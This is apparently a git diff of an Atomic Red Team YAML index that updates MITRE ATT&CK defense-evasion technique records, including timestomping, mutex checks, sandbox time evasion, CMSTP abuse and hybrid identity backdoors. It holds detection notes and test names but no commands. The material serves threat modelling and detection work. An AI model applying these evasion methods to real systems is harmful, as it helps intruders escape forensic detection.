+        Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
         Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Romain Dumont, ESET
+      - Mike Hartley @mikehartley10
+      x_mitre_deprecated: false
       x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
         have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
         It may be possible to detect timestomping using file modification monitoring
         that collects information on file handle opens and can compare timestamp values.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Process: OS API Execution'
       - 'File: File Modification'
       - 'File: File Metadata'
+      - 'Command: Command Execution'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_permissions_required:
-      - root
-      - SYSTEM
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+      created: '2020-01-31T12:42:44.103Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/006
+        external_id: T1070.006
+      - source_name: WindowsIR Anti-Forensic Techniques
+        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+        url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+      - source_name: Inversecos Timestomping 2022
+        description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+          Detection – NTFS Forensics. Retrieved September 30, 2024.'
+        url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+      - source_name: Magnet Forensics
+        description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+          with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+        url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+      - source_name: Double Timestomping
+        description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+          ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+        url: https://x.com/matthewdunwoody/status/1519846657646604289
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1070.006
     atomic_tests:
     - name: Set a file's access timestamp
@@ -5832,9 +5917,76 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1620
     atomic_tests: []
+  T1480.002:
+    technique:
+      modified: '2024-10-28T16:22:25.431Z'
+      name: Mutual Exclusion
+      description: |-
+        Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+        While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+        In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+        Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Manikantan Srinivasan, NEC Corporation India
+      - Pooja Natarajan, NEC Corporation India
+      - Nagahama Hiroki – NEC Corporation Japan
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: OS API Execution'
+      - 'File: File Creation'
+      type: attack-pattern
+      id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+      created: '2024-09-19T14:00:03.401Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1480/002
+        external_id: T1480.002
+      - source_name: Intezer RedXOR 2021
+        description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+          Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+          September 19, 2024.
+        url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+      - source_name: Sans Mutexes 2012
+        description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+          Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+        url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+      - source_name: ICS Mutexes 2015
+        description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+          to Evade Detection. Retrieved September 19, 2024.
+        url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+      - source_name: Microsoft Mutexes
+        description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+          2024.
+        url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+      - source_name: Deep Instinct BPFDoor 2023
+        description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+          Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+          19, 2024.
+        url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.011:
     technique:
       modified: '2023-11-06T20:14:51.609Z'
@@ -5898,57 +6050,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
-      type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -5963,6 +6068,12 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -5972,9 +6083,14 @@ defense-evasion:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -5984,8 +6100,44 @@ defense-evasion:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests:
     - name: Delay execution with ping
@@ -6014,7 +6166,7 @@ defense-evasion:
         name: sh
   T1218.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:35:43.077Z'
       name: 'Signed Binary Proxy Execution: CMSTP'
       description: |-
         Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -6060,8 +6212,8 @@ defense-evasion:
         external_id: T1218.003
       - source_name: Twitter CMSTP Usage Jan 2018
         description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
-          Retrieved April 11, 2018.
-        url: https://twitter.com/ItsReallyNick/status/958789644165894146
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/958789644165894146
       - source_name: Microsoft Connection Manager Oct 2009
         description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
           April 11, 2018.
@@ -6080,13 +6232,12 @@ defense-evasion:
         url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
       - source_name: Twitter CMSTP Jan 2018
         description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
-          applocker bypass. Retrieved April 11, 2018.
-        url: https://twitter.com/NickTyrer/status/958450014111633408
+          applocker bypass. Retrieved September 12, 2024.
+        url: https://x.com/NickTyrer/status/958450014111633408
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.003
     atomic_tests: []
   T1562.002:
@@ -6201,7 +6352,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.002
     atomic_tests: []
   T1218.002:
@@ -6242,7 +6392,7 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
         description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
           HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T19:01:55.821Z'
       name: 'Signed Binary Proxy Execution: Control Panel'
       description: |-
         Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -6281,8 +6431,6 @@ defense-evasion:
       - User
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.002
     atomic_tests: []
   T1599.001:
@@ -6305,7 +6453,7 @@ defense-evasion:
         url: https://tools.ietf.org/html/rfc1918
         description: IETF Network Working Group. (1996, February). Address Allocation
           for Private Internets. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T01:45:58.951Z'
       name: Network Address Translation Traversal
       description: "Adversaries may bridge network boundaries by modifying a network
         device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -6344,12 +6492,10 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -6376,6 +6522,7 @@ defense-evasion:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -6393,12 +6540,12 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -6424,18 +6571,17 @@ defense-evasion:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.004:
     technique:
-      modified: '2024-03-28T00:01:08.337Z'
+      modified: '2024-09-12T19:37:57.867Z'
       name: 'Impair Defenses: Disable or Modify System Firewall'
       description: |-
         Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -6480,13 +6626,12 @@ defense-evasion:
         url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.004
     atomic_tests:
     - name: Stop/Start UFW firewall
@@ -6913,7 +7058,7 @@ defense-evasion:
         * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
 
         Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T04:58:58.214Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
       x_mitre_detection: |-
@@ -6946,35 +7091,34 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.003
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -6982,9 +7126,9 @@ defense-evasion:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -6993,21 +7137,22 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -7047,9 +7192,6 @@ defense-evasion:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.015:
     technique:
@@ -7112,7 +7254,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.012:
     technique:
@@ -7172,7 +7313,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.012
     atomic_tests:
     - name: Delete all auditd rules using auditctl
@@ -7279,7 +7419,7 @@ defense-evasion:
         description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
           Retrieved March 30, 2018.
         source_name: ADDSecurity DCShadow Feb 2018
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:20:04.850Z'
       name: Rogue Domain Controller
       description: |-
         Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -7310,8 +7450,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1207
     atomic_tests: []
   T1553.006:
@@ -7401,7 +7539,7 @@ defense-evasion:
         Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
         vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
         Driver Loader)"
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:03.480Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: Code Signing Policy Modification'
       x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -7425,12 +7563,11 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.006
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -7509,7 +7646,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1112:
@@ -7594,12 +7730,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1112
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -7618,6 +7753,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -7625,7 +7761,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -7645,29 +7780,31 @@ defense-evasion:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
